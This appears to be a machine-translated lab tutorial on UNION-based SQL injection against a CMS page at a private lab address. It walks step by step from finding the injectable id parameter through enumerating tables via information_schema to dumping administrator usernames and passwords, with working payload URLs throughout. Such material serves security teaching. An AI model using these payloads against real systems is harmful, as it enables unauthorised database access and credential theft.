[SQL injection] joint query

adopt CMS News page , Get the account and password of the background administrator

order by number: Sort by the column

Catalog

1、 Test for injection points

2、 String together , Determine the number of columns of the query data

3、 Use UNION function , Joint query

4、 Through echoed columns , Make use of

5、 utilize information_schema library , Check the table name of the database

6、 utilize information_schema library , Query the column name of the specified table in the specified database

7、 utilize information_schema library , Query the data of the column of the specified table in the specified database

1、 Test for injection points

By entering an error message into the parameter , It is found that this is an error report , And in the error message , Numbers that do not contain the parameters we entered , So we can know that this is a digital line injection , No closing symbol is required

There are injection points

2、 String together , Determine the number of columns of the query data

After finding the injection point , Use and String together , Discovery can succeed

Combine what you have learned , It can be judged , The number of columns of this function , The sentence used is order by number

 http://192.168.79.147/cms/show.php?id=33 order by 100

Because I need to use UNION function , Longitudinal splicing of two query statements

UNION The condition of the function is ： The number of columns is equal , The types of corresponding columns are roughly the same

According to the above method （ Dichotomy search , Test it out ）, You can know , The number of columns queried 15 Column

Query to 16 Column , Wrong report

3、 Use UNION function , Joint query

When we use UNION Function for joint query

Because of the SQL Statement we have fewer controllable parameters , Generally, it is not allowed to enter , It can be achieved by ID Parameter is a wrong parameter , It won't show

We just need to use the following statement

The statement is as follows ：http://192.168.79.147/cms/show.php?id=-33 UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

You can find , The echoed data is 3 and 11, You can know , Echo the query value of the number of columns

4、 Through echoed columns , Make use of

 http://192.168.79.147/cms/show.php?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15

View the database used by the current server edition and database name

5、 utilize information_schema library , Check the table name of the database

according to 4 Information about , It is known that the version of the database used is 5.5.53 because 5.0 The above version has a information_schema database , It contains the basic information of the database

And the names of all databases

Table names of all databases

Field names of tables in all databases

We can use this database , Query the information of the whole table

The steps of database collection are Library name - Table name - Field name - Data and information

• The name of the known database is cms

• Query the database cms Table name of

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,hex(table_name),12,13,14,15 from information_schema.tables

The table name queried without database filtering

Do database filtering to query the table name

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,hex(table_name),12,13,14,15 from information_schema.tables where table_schema = "cms"

• Query out cms In the database , All table names

  Using functions group_concat(table_name) All data of the specified column , Splice through commas

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema = "cms"

6、 utilize information_schema library , Query the column name of the specified table in the specified database

Use group_concat( Specified column name )： Query all the data of the specified column , Separated by commas

 select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema="cms" and table_name="cms_users"
 ​
 # from information_schema Database columns In the table 
 # When in this table table_schema Field equals cms,table_name Field equals cms_users When 
 # Inquire about 15 Column , Query out column_name All the data in the column , According to the 11 Column 

The fields queried are three

Got it cms_users Fields in the table

7、 utilize information_schema library , Query the data of the column of the specified table in the specified database

Using functions concat: Two fields of the same table will be queried , Splice together

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,3,4,5,6,7,8,9,10,hex(concat(username,0x3a,password)),12,13,14,15 from cms_users limit 1,2

 # there limit 1,2 Refer to ： Query a data , From the second , The first is the 0

 ​

Get the specified data